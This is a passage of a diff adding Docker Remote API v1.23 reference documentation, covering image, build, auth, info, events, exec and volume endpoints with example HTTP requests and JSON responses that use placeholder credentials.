"localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf" + ], + "RepoTags": [ + "localhost:5000/test/busybox:latest", + "playdate:latest" + ], + "Size": 0, + "VirtualSize": 2429728, + "Labels": {} + } + ] + +The response shows a single image `Id` associated with two repositories +(`RepoTags`): `localhost:5000/test/busybox`: and `playdate`. A caller can use +either of the `RepoTags` values `localhost:5000/test/busybox:latest` or +`playdate:latest` to reference the image. + +You can also use `RepoDigests` values to reference an image. In this response, +the array has only one reference and that is to the +`localhost:5000/test/busybox` repository; the `playdate` repository has no +digest. You can reference this digest using the value: +`localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d...` + +See the `docker run` and `docker build` commands for examples of digest and tag +references on the command line. + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, default false +- **filters** – a JSON encoded value of the filters (a map[string][]string) to process on the images list. Available filters: + - `dangling=true` + - `label=key` or `label="key=value"` of an image label +- **filter** - only return images with the specified name + +#### Build image from a Dockerfile + +`POST /build` + +Build an image from a Dockerfile + +**Example request**: + + POST /v1.23/build HTTP/1.1 + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"stream": "Step 1/5..."} + {"stream": "..."} + {"error": "Error...", "errorDetail": {"code": 123, "message": "Error..."}} + +The input stream must be a `tar` archive compressed with one of the +following algorithms: `identity` (no compression), `gzip`, `bzip2`, `xz`. + +The archive must include a build instructions file, typically called +`Dockerfile` at the archive's root. The `dockerfile` parameter may be +used to specify a different build instructions file. To do this, its value must be +the path to the alternate build instructions file to use. + +The archive may include any number of other files, +which are accessible in the build context (See the [*ADD build +command*](../reference/builder.md#add)). + +The Docker daemon performs a preliminary validation of the `Dockerfile` before +starting the build, and returns an error if the syntax is incorrect. After that, +each instruction is run one-by-one until the ID of the new image is output. + +The build is canceled if the client drops the connection by quitting +or being killed. + +**Query parameters**: + +- **dockerfile** - Path within the build context to the `Dockerfile`. This is + ignored if `remote` is specified and points to an external `Dockerfile`. +- **t** – A name and optional tag to apply to the image in the `name:tag` format. + If you omit the `tag` the default `latest` value is assumed. + You can provide one or more `t` parameters. +- **remote** – A Git repository URI or HTTP/HTTPS context URI. If the + URI points to a single text file, the file's contents are placed into + a file called `Dockerfile` and the image is built from that file. If + the URI points to a tarball, the file is downloaded by the daemon and + the contents therein used as the context for the build. If the URI + points to a tarball and the `dockerfile` parameter is also specified, + there must be a file with the corresponding path inside the tarball. +- **q** – Suppress verbose build output. +- **nocache** – Do not use the cache when building the image. +- **pull** - Attempt to pull the image even if an older image exists locally. +- **rm** - Remove intermediate containers after a successful build (default behavior). +- **forcerm** - Always remove intermediate containers (includes `rm`). +- **memory** - Set memory limit for build. +- **memswap** - Total memory (memory + swap), `-1` to enable unlimited swap. +- **cpushares** - CPU shares (relative weight). +- **cpusetcpus** - CPUs in which to allow execution (e.g., `0-3`, `0,1`). +- **cpuperiod** - The length of a CPU period in microseconds. +- **cpuquota** - Microseconds of CPU time that the container can get in a CPU period. +- **buildargs** – JSON map of string pairs for build-time variables. Users pass + these values at build-time. Docker uses the `buildargs` as the environment + context for command(s) run via the Dockerfile's `RUN` instruction or for + variable expansion in other Dockerfile instructions. This is not meant for + passing secret values. [Read more about the buildargs instruction](../reference/builder.md#arg) +- **shmsize** - Size of `/dev/shm` in bytes. The size must be greater than 0. If omitted the system uses 64MB. +- **labels** – JSON map of string pairs for labels to set on the image. + +**Request Headers**: + +- **Content-type** – Set to `"application/tar"`. +- **X-Registry-Config** – A base64-url-safe-encoded Registry Auth Config JSON + object with the following structure: + + { + "docker.example.com": { + "username": "janedoe", + "password": "hunter2" + }, + "https://index.docker.io/v1/": { + "username": "mobydock", + "password": "conta1n3rize14" + } + } + + This object maps the hostname of a registry to an object containing the + "username" and "password" for that registry. Multiple registries may + be specified as the build may be based on an image requiring + authentication to pull from any arbitrary registry. Only the registry + domain name (and port if not the default "443") are required. However + (for legacy reasons) the "official" Docker, Inc. hosted registry must + be specified with both a "https://" prefix and a "/v1/" suffix even + though Docker will prefer to use the v2 registry API. + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Create an image + +`POST /images/create` + +Create an image either by pulling it from the registry or by importing it + +**Example request**: + + POST /v1.23/images/create?fromImage=busybox&tag=latest HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pulling..."} + {"status": "Pulling", "progress": "1 B/ 100 B", "progressDetail": {"current": 1, "total": 100}} + {"error": "Invalid..."} + ... + +When using this endpoint to pull an image from the registry, the +`X-Registry-Auth` header can be used to include +a base64-encoded AuthConfig object. + +**Query parameters**: + +- **fromImage** – Name of the image to pull. The name may include a tag or + digest. This parameter may only be used when pulling an image. + The pull is cancelled if the HTTP connection is closed. +- **fromSrc** – Source to import. The value may be a URL from which the image + can be retrieved or `-` to read the image from the request body. + This parameter may only be used when importing an image. +- **repo** – Repository name given to an image when it is imported. + The repo may include a tag. This parameter may only be used when importing + an image. +- **tag** – Tag or digest. If empty when pulling an image, this causes all tags + for the given image to be pulled. + +**Request Headers**: + +- **X-Registry-Auth** – base64-encoded AuthConfig object, containing either login information, or a token + - Credential based login: + + ``` + { + "username": "jdoe", + "password": "secret", + "email": "jdoe@acme.com" + } + ``` + + - Token based login: + + ``` + { + "identitytoken": "9cbaf023786cd7..." + } + ``` + +**Status codes**: + +- **200** – no error +- **404** - repository does not exist or no read access +- **500** – server error + + + +#### Inspect an image + +`GET /images/(name)/json` + +Return low-level information on the image `name` + +**Example request**: + + GET /v1.23/images/example/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Id" : "sha256:85f05633ddc1c50679be2b16a0479ab6f7637f8884e0cfe0f4d20e1ebb3d6e7c", + "Container" : "cb91e48a60d01f1e27028b4fc6819f4f290b3cf12496c8176ec714d0d390984a", + "Comment" : "", + "Os" : "linux", + "Architecture" : "amd64", + "Parent" : "sha256:91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + "ContainerConfig" : { + "Tty" : false, + "Hostname" : "e611e15f9c9d", + "Volumes" : null, + "Domainname" : "", + "AttachStdout" : false, + "PublishService" : "", + "AttachStdin" : false, + "OpenStdin" : false, + "StdinOnce" : false, + "NetworkDisabled" : false, + "OnBuild" : [], + "Image" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + "User" : "", + "WorkingDir" : "", + "Entrypoint" : null, + "MacAddress" : "", + "AttachStderr" : false, + "Labels" : { + "com.example.license" : "GPL", + "com.example.version" : "1.0", + "com.example.vendor" : "Acme" + }, + "Env" : [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "ExposedPorts" : null, + "Cmd" : [ + "/bin/sh", + "-c", + "#(nop) LABEL com.example.vendor=Acme com.example.license=GPL com.example.version=1.0" + ] + }, + "DockerVersion" : "1.9.0-dev", + "VirtualSize" : 188359297, + "Size" : 0, + "Author" : "", + "Created" : "2015-09-10T08:30:53.26995814Z", + "GraphDriver" : { + "Name" : "aufs", + "Data" : null + }, + "RepoDigests" : [ + "localhost:5000/test/busybox/example@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf" + ], + "RepoTags" : [ + "example:1.0", + "example:latest", + "example:stable" + ], + "Config" : { + "Image" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + "NetworkDisabled" : false, + "OnBuild" : [], + "StdinOnce" : false, + "PublishService" : "", + "AttachStdin" : false, + "OpenStdin" : false, + "Domainname" : "", + "AttachStdout" : false, + "Tty" : false, + "Hostname" : "e611e15f9c9d", + "Volumes" : null, + "Cmd" : [ + "/bin/bash" + ], + "ExposedPorts" : null, + "Env" : [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "Labels" : { + "com.example.vendor" : "Acme", + "com.example.version" : "1.0", + "com.example.license" : "GPL" + }, + "Entrypoint" : null, + "MacAddress" : "", + "AttachStderr" : false, + "WorkingDir" : "", + "User" : "" + }, + "RootFS": { + "Type": "layers", + "Layers": [ + "sha256:1834950e52ce4d5a88a1bbd131c537f4d0e56d10ff0dd69e66be3b7dfa9df7e6", + "sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef" + ] + } + } + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Get the history of an image + +`GET /images/(name)/history` + +Return the history of the image `name` + +**Example request**: + + GET /v1.23/images/ubuntu/history HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "3db9c44f45209632d6050b35958829c3a2aa256d81b9a7be45b362ff85c54710", + "Created": 1398108230, + "CreatedBy": "/bin/sh -c #(nop) ADD file:eb15dbd63394e063b805a3c32ca7bf0266ef64676d5a6fab4801f2e81e2a5148 in /", + "Tags": [ + "ubuntu:lucid", + "ubuntu:10.04" + ], + "Size": 182964289, + "Comment": "" + }, + { + "Id": "6cfa4d1f33fb861d4d114f43b25abd0ac737509268065cdfd69d544a59c85ab8", + "Created": 1398108222, + "CreatedBy": "/bin/sh -c #(nop) MAINTAINER Tianon Gravi - mkimage-debootstrap.sh -i iproute,iputils-ping,ubuntu-minimal -t lucid.tar.xz lucid http://archive.ubuntu.com/ubuntu/", + "Tags": null, + "Size": 0, + "Comment": "" + }, + { + "Id": "511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158", + "Created": 1371157430, + "CreatedBy": "", + "Tags": [ + "scratch12:latest", + "scratch:latest" + ], + "Size": 0, + "Comment": "Imported from -" + } + ] + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Push an image on the registry + +`POST /images/(name)/push` + +Push the image `name` on the registry + +**Example request**: + + POST /v1.23/images/test/push HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pushing..."} + {"status": "Pushing", "progress": "1/? (n/a)", "progressDetail": {"current": 1}}} + {"error": "Invalid..."} + ... + +If you wish to push an image on to a private registry, that image must already have a tag +into a repository which references that registry `hostname` and `port`. This repository name should +then be used in the URL. This duplicates the command line's flow. + +The push is cancelled if the HTTP connection is closed. + +**Example request**: + + POST /v1.23/images/registry.acme.com:5000/test/push HTTP/1.1 + + +**Query parameters**: + +- **tag** – The tag to associate with the image on the registry. This is optional. + +**Request Headers**: + +- **X-Registry-Auth** – base64-encoded AuthConfig object, containing either login information, or a token + - Credential based login: + + ``` + { + "username": "jdoe", + "password": "secret", + "email": "jdoe@acme.com", + } + ``` + + - Identity token based login: + + ``` + { + "identitytoken": "9cbaf023786cd7..." + } + ``` + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Tag an image into a repository + +`POST /images/(name)/tag` + +Tag the image `name` into a repository + +**Example request**: + + POST /v1.23/images/test/tag?repo=myrepo&force=0&tag=v42 HTTP/1.1 + +**Example response**: + + HTTP/1.1 201 Created + +**Query parameters**: + +- **repo** – The repository to tag in +- **force** – 1/True/true or 0/False/false, default false +- **tag** - The new tag name + +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such image +- **409** – conflict +- **500** – server error + +#### Remove an image + +`DELETE /images/(name)` + +Remove the image `name` from the filesystem + +**Example request**: + + DELETE /v1.23/images/test HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-type: application/json + + [ + {"Untagged": "3e2f21a89f"}, + {"Deleted": "3e2f21a89f"}, + {"Deleted": "53b4f83ac9"} + ] + +**Query parameters**: + +- **force** – 1/True/true or 0/False/false, default false +- **noprune** – 1/True/true or 0/False/false, default false + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **409** – conflict +- **500** – server error + +#### Search images + +`GET /images/search` + +Search for an image on [Docker Hub](https://hub.docker.com). + +> **Note**: +> The response keys have changed from API v1.6 to reflect the JSON +> sent by the registry server to the docker daemon's request. + +**Example request**: + + GET /v1.23/images/search?term=sshd HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "wma55/u1210sshd", + "star_count": 0 + }, + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "jdswinbank/sshd", + "star_count": 0 + }, + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "vgauthier/sshd", + "star_count": 0 + } + ... + ] + +**Query parameters**: + +- **term** – term to search + +**Status codes**: + +- **200** – no error +- **500** – server error + +### 2.3 Misc + +#### Check auth configuration + +`POST /auth` + +Validate credentials for a registry and get identity token, +if available, for accessing the registry without password. + +**Example request**: + + POST /v1.23/auth HTTP/1.1 + Content-Type: application/json + + { + "username": "hannibal", + "password": "xxxx", + "serveraddress": "https://index.docker.io/v1/" + } + +**Example response**: + + HTTP/1.1 200 OK + + { + "Status": "Login Succeeded", + "IdentityToken": "9cbaf023786cd7..." + } + +**Status codes**: + +- **200** – no error +- **204** – no error +- **500** – server error + +#### Display system-wide information + +`GET /info` + +Display system-wide information + +**Example request**: + + GET /v1.23/info HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Architecture": "x86_64", + "ClusterStore": "etcd://localhost:2379", + "CgroupDriver": "cgroupfs", + "Containers": 11, + "ContainersRunning": 7, + "ContainersStopped": 3, + "ContainersPaused": 1, + "CpuCfsPeriod": true, + "CpuCfsQuota": true, + "Debug": false, + "DockerRootDir": "/var/lib/docker", + "Driver": "btrfs", + "DriverStatus": [[""]], + "ExecutionDriver": "native-0.1", + "ExperimentalBuild": false, + "HttpProxy": "http://test:test@localhost:8080", + "HttpsProxy": "https://test:test@localhost:8080", + "ID": "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS", + "IPv4Forwarding": true, + "Images": 16, + "IndexServerAddress": "https://index.docker.io/v1/", + "InitPath": "/usr/bin/docker", + "InitSha1": "", + "KernelMemory": true, + "KernelVersion": "3.12.0-1-amd64", + "Labels": [ + "storage=ssd" + ], + "MemTotal": 2099236864, + "MemoryLimit": true, + "NCPU": 1, + "NEventsListener": 0, + "NFd": 11, + "NGoroutines": 21, + "Name": "prod-server-42", + "NoProxy": "9.81.1.160", + "OomKillDisable": true, + "OSType": "linux", + "OperatingSystem": "Boot2Docker", + "Plugins": { + "Volume": [ + "local" + ], + "Network": [ + "null", + "host", + "bridge" + ] + }, + "RegistryConfig": { + "IndexConfigs": { + "docker.io": { + "Mirrors": null, + "Name": "docker.io", + "Official": true, + "Secure": true + } + }, + "InsecureRegistryCIDRs": [ + "127.0.0.0/8" + ] + }, + "ServerVersion": "1.9.0", + "SwapLimit": false, + "SystemStatus": [["State", "Healthy"]], + "SystemTime": "2015-03-10T11:11:23.730591467-07:00" + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Show the docker version information + +`GET /version` + +Show the docker version information + +**Example request**: + + GET /v1.23/version HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Version": "1.11.0", + "Os": "linux", + "KernelVersion": "3.19.0-23-generic", + "GoVersion": "go1.4.2", + "GitCommit": "e75da4b", + "Arch": "amd64", + "ApiVersion": "1.23", + "BuildTime": "2015-12-01T07:09:13.444803460+00:00", + "Experimental": true + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Ping the docker server + +`GET /_ping` + +Ping the docker server + +**Example request**: + + GET /v1.23/_ping HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: text/plain + + OK + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Create a new image from a container's changes + +`POST /commit` + +Create a new image from a container's changes + +**Example request**: + + POST /v1.23/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": [ + "date" + ], + "Mounts": [ + { + "Source": "/data", + "Destination": "/data", + "Mode": "ro,Z", + "RW": false + } + ], + "Labels": { + "key1": "value1", + "key2": "value2" + }, + "WorkingDir": "", + "NetworkDisabled": false, + "ExposedPorts": { + "22/tcp": {} + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + {"Id": "596069db4bf5"} + +**JSON parameters**: + +- **config** - the container's configuration + +**Query parameters**: + +- **container** – source container +- **repo** – repository +- **tag** – tag +- **comment** – commit message +- **author** – author (e.g., "John Hannibal Smith + <[hannibal@a-team.com](mailto:hannibal%40a-team.com)>") +- **pause** – 1/True/true or 0/False/false, whether to pause the container before committing +- **changes** – Dockerfile instructions to apply while committing + +**Status codes**: + +- **201** – no error +- **404** – no such container +- **500** – server error + +#### Monitor Docker's events + +`GET /events` + +Get container events from docker, in real time via streaming. + +Docker containers report the following events: + + attach, commit, copy, create, destroy, die, exec_create, exec_start, export, kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update + +Docker images report the following events: + + delete, import, pull, push, tag, untag + +Docker volumes report the following events: + + create, mount, unmount, destroy + +Docker networks report the following events: + + create, connect, disconnect, destroy + +**Example request**: + + GET /v1.23/events?since=1374067924 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + Server: Docker/1.11.0 (linux) + Date: Fri, 29 Apr 2016 15:18:06 GMT + Transfer-Encoding: chunked + + { + "status": "pull", + "id": "alpine:latest", + "Type": "image", + "Action": "pull", + "Actor": { + "ID": "alpine:latest", + "Attributes": { + "name": "alpine" + } + }, + "time": 1461943101, + "timeNano": 1461943101301854122 + } + { + "status": "create", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "create", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943101, + "timeNano": 1461943101381709551 + } + { + "status": "attach", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "attach", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943101, + "timeNano": 1461943101383858412 + } + { + "Type": "network", + "Action": "connect", + "Actor": { + "ID": "7dc8ac97d5d29ef6c31b6052f3938c1e8f2749abbd17d1bd1febf2608db1b474", + "Attributes": { + "container": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "name": "bridge", + "type": "bridge" + } + }, + "time": 1461943101, + "timeNano": 1461943101394865557 + } + { + "status": "start", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "start", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943101, + "timeNano": 1461943101607533796 + } + { + "status": "resize", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "resize", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "height": "46", + "image": "alpine", + "name": "my-container", + "width": "204" + } + }, + "time": 1461943101, + "timeNano": 1461943101610269268 + } + { + "status": "die", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "die", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "exitCode": "0", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943105, + "timeNano": 1461943105079144137 + } + { + "Type": "network", + "Action": "disconnect", + "Actor": { + "ID": "7dc8ac97d5d29ef6c31b6052f3938c1e8f2749abbd17d1bd1febf2608db1b474", + "Attributes": { + "container": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "name": "bridge", + "type": "bridge" + } + }, + "time": 1461943105, + "timeNano": 1461943105230860245 + } + { + "status": "destroy", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "destroy", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943105, + "timeNano": 1461943105338056026 + } + +**Query parameters**: + +- **since** – Timestamp. Show all events created since timestamp and then stream +- **until** – Timestamp. Show events created until given timestamp and stop streaming +- **filters** – A json encoded value of the filters (a map[string][]string) to process on the event list. Available filters: + - `container=`; -- container to filter + - `event=`; -- event to filter + - `image=`; -- image to filter + - `label=`; -- image and container label to filter + - `type=`; -- either `container` or `image` or `volume` or `network` + - `volume=`; -- volume to filter + - `network=`; -- network to filter + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images in a repository + +`GET /images/(name)/get` + +Get a tarball containing all images and metadata for the repository specified +by `name`. + +If `name` is a specific name and tag (e.g. ubuntu:latest), then only that image +(and its parents) are returned. If `name` is an image ID, similarly only that +image (and its parents) are returned, but with the exclusion of the +'repositories' file in the tarball, as there were no image names referenced. + +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + GET /v1.23/images/ubuntu/get + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images + +`GET /images/get` + +Get a tarball containing all images and metadata for one or more repositories. + +For each value of the `names` parameter: if it is a specific name and tag (e.g. +`ubuntu:latest`), then only that image (and its parents) are returned; if it is +an image ID, similarly only that image (and its parents) are returned and there +would be no names referenced in the 'repositories' file for this image ID. + +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + GET /v1.23/images/get?names=myname%2Fmyapp%3Alatest&names=busybox + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Load a tarball with a set of images and tags into docker + +`POST /images/load` + +Load a set of images and tags into a Docker repository. +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + POST /v1.23/images/load + Content-Type: application/x-tar + + Tarball in body + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + Transfer-Encoding: chunked + + {"status":"Loading layer","progressDetail":{"current":32768,"total":1292800},"progress":"[= ] 32.77 kB/1.293 MB","id":"8ac8bfaff55a"} + {"status":"Loading layer","progressDetail":{"current":65536,"total":1292800},"progress":"[== ] 65.54 kB/1.293 MB","id":"8ac8bfaff55a"} + {"status":"Loading layer","progressDetail":{"current":98304,"total":1292800},"progress":"[=== ] 98.3 kB/1.293 MB","id":"8ac8bfaff55a"} + {"status":"Loading layer","progressDetail":{"current":131072,"total":1292800},"progress":"[===== ] 131.1 kB/1.293 MB","id":"8ac8bfaff55a"} + ... + {"stream":"Loaded image: busybox:latest\n"} + +**Example response**: + +If the "quiet" query parameter is set to `true` / `1` (`?quiet=1`), progress +details are suppressed, and only a confirmation message is returned once the +action completes. + + HTTP/1.1 200 OK + Content-Type: application/json + Transfer-Encoding: chunked + + {"stream":"Loaded image: busybox:latest\n"} + +**Query parameters**: + +- **quiet** – Boolean value, suppress progress details during load. Defaults + to `0` / `false` if omitted. + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Image tarball format + +An image tarball contains one directory per image layer (named using its long ID), +each containing these files: + +- `VERSION`: currently `1.0` - the file format version +- `json`: detailed layer information, similar to `docker inspect layer_id` +- `layer.tar`: A tarfile containing the filesystem changes in this layer + +The `layer.tar` file contains `aufs` style `.wh..wh.aufs` files and directories +for storing attribute changes and deletions. + +If the tarball defines a repository, the tarball should also include a `repositories` file at +the root that contains a list of repository and tag names mapped to layer IDs. + +``` +{"hello-world": + {"latest": "565a9d68a73f6706862bfe8409a7f659776d4d60a8d096eb4a3cbce6999cc2a1"} +} +``` + +#### Exec Create + +`POST /containers/(id or name)/exec` + +Sets up an exec instance in a running container `id` + +**Example request**: + + POST /v1.23/containers/e90e34656806/exec HTTP/1.1 + Content-Type: application/json + + { + "AttachStdin": true, + "AttachStdout": true, + "AttachStderr": true, + "Cmd": ["sh"], + "DetachKeys": "ctrl-p,ctrl-q", + "Privileged": true, + "Tty": true, + "User": "123:456" + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id": "f90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **AttachStdin** - Boolean value, attaches to `stdin` of the `exec` command. +- **AttachStdout** - Boolean value, attaches to `stdout` of the `exec` command. +- **AttachStderr** - Boolean value, attaches to `stderr` of the `exec` command. +- **DetachKeys** – Override the key sequence for detaching a + container. Format is a single character `[a-Z]` or `ctrl-` + where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. +- **Tty** - Boolean value to allocate a pseudo-TTY. +- **Cmd** - Command to run specified as a string or an array of strings. +- **Privileged** - Boolean value, runs the exec process with extended privileges. +- **User** - A string value specifying the user, and optionally, group to run + the exec process inside the container. Format is one of: `"user"`, + `"user:group"`, `"uid"`, or `"uid:gid"`. + +**Status codes**: + +- **201** – no error +- **404** – no such container +- **409** - container is paused +- **500** - server error + +#### Exec Start + +`POST /exec/(id)/start` + +Starts a previously set up `exec` instance `id`. If `detach` is true, this API +returns after starting the `exec` command. Otherwise, this API sets up an +interactive session with the `exec` command. + +**Example request**: + + POST /v1.23/exec/e90e34656806/start HTTP/1.1 + Content-Type: application/json + + { + "Detach": false, + "Tty": false + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/vnd.docker.raw-stream + + {% raw %} + {{ STREAM }} + {% endraw %} + +**JSON parameters**: + +- **Detach** - Detach from the `exec` command. +- **Tty** - Boolean value to allocate a pseudo-TTY. + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance +- **409** - container is paused + +**Stream details**: + +Similar to the stream behavior of `POST /containers/(id or name)/attach` API + +#### Exec Resize + +`POST /exec/(id)/resize` + +Resizes the `tty` session used by the `exec` command `id`. The unit is number of characters. +This API is valid only if `tty` was specified as part of creating and starting the `exec` command. + +**Example request**: + + POST /v1.23/exec/e90e34656806/resize?h=40&w=80 HTTP/1.1 + Content-Type: text/plain + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: text/plain + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **201** – no error +- **404** – no such exec instance + +#### Exec Inspect + +`GET /exec/(id)/json` + +Return low-level information about the `exec` command `id`. + +**Example request**: + + GET /v1.23/exec/11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "CanRemove": false, + "ContainerID": "b53ee82b53a40c7dca428523e34f741f3abc51d9f297a14ff874bf761b995126", + "DetachKeys": "", + "ExitCode": 2, + "ID": "f33bbfb39f5b142420f4759b2348913bd4a8d1a6d7fd56499cb41a1bb91d7b3b", + "OpenStderr": true, + "OpenStdin": true, + "OpenStdout": true, + "ProcessConfig": { + "arguments": [ + "-c", + "exit 2" + ], + "entrypoint": "sh", + "privileged": false, + "tty": true, + "user": "1000" + }, + "Running": false + } + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance +- **500** - server error + +### 2.4 Volumes + +#### List volumes + +`GET /volumes` + +**Example request**: + + GET /v1.23/volumes HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Volumes": [ + { + "Name": "tardis", + "Driver": "local", + "Mountpoint": "/var/lib/docker/volumes/tardis" + } + ], + "Warnings": [] + } + +**Query parameters**: + +- **filters** - JSON encoded value of the filters (a `map[string][]string`) to process on the volumes list. There is one available filter: `dangling=true` + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Create a volume + +`POST /volumes/create` + +Create a volume + +**Example request**: + + POST /v1.23/volumes/create HTTP/1.1 + Content-Type: application/json + + { + "Name": "tardis", + "Labels": { + "com.example.some-label": "some-value", + "com.example.some-other-label": "some-other-value" + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Name": "tardis", + "Driver": "local", + "Mountpoint": "/var/lib/docker/volumes/tardis", + "Labels": { + "com.example.some-label": "some-value", + "com.example.some-other-label": "some-other-value" + } + } + +**Status codes**: + +- **201** - no error +- **500** - server error + +**JSON parameters**: + +- **Name** - The new volume's name. If not specified, Docker generates a name. +- **Driver** - Name of the volume driver to use. Defaults to `local` for the name. +- **DriverOpts** - A mapping of driver options and values. These options are + passed directly to the driver and are driver specific. +- **Labels** - Labels to set on the volume, specified as a map: `{"key":"value","key2":"value2"}` + +#### Inspect a volume + +`GET /volumes/(name)` + +Return low-level information on the volume `name` + +**Example request**: + + GET /v1.23/volumes/tardis + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Name": "tardis", + "Driver": "local", + "Mountpoint": "/var/lib/docker/volumes/tardis/_data", + "Labels": { + "com.example.some-label": "some-value", + "com.example.some-other-label": 